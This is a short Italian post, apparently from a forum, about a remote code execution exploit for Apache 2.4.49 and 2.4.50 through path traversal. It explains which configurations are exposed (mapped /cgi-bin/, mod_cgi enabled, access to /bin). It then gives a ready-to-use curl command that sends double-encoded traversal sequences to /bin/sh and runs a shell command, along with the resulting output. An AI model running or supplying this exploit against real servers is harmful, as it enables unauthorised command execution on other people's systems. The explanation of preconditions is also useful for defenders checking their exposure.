
Exploit per esecuzione di codice remoto su server Apache. Versioni interessate: Apache 2.4.49, Apache 2.4.50
IMHO solo configurazioni "particolari" saranno vulnerabili a questo RCE.
Lo stesso vale per gli exploit di "lettura arbitraria di file" che hai visto.
Entrambi i CVE sono in pratica quasi la stessa vulnerabilità di path traversal (il secondo è la correzione incompleta del primo).
Il path traversal funziona solo da un URI mappato (es. tramite direttive Apache "Alias" o "ScriptAlias"). Solo DocumentRoot non è sufficiente.
"/cgi-bin/" è mappato di default (ScriptAlias), ecco perché viene usato prima della stringa di path traversal.
Inoltre, ScriptAlias segna come Exec (per Apache) tutti i contenuti della directory specificata (indipendentemente dalle estensioni dei file).
1/ mod_cgi abilitato (non di default ma facile)
2/ il binario target deve essere +x (default per /bin/sh)
3/ permessi di Apache concessi per /bin o / (non di default e difficile/irreale)\
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)